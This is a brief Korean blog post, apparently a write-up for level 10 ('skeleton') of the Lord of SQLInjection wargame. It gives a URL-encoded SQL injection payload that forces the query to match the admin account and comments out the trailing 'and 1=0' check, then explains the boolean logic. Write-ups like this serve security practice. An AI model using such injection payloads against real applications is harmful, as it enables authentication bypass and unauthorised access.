반응형
Lord of SQLInjection
los.rubiya.kr
Lord of SQLInjection 10번 skeleton
이전에 풀었던 wolfman 문제와 비슷하다
뒤에 and 연산이 붙었는데 주석처리를 하여 검증을 하지 못하도록 하면 된다.
?pw=%27or%20id=%27admin%27%23
id='guest' and pw=''or id='admin'#' and 1=0
false and false or true (and는 주석처리)false or truetrue
반응형
'#WarGame > Lord of SQLInjection' 카테고리의 다른 글
| Lord of SQLInjection 12번 darkknight (0) | 2021.08.10 |
|---|---|
| Lord of SQLInjection 11번 golem (0) | 2021.08.09 |
| Lord of SQLInjection 9번 vampire (0) | 2021.08.07 |
| Lord of SQLInjection 8번 troll (0) | 2021.08.07 |
| Lord of SQLInjection 7번 orge (0) | 2021.08.07 |
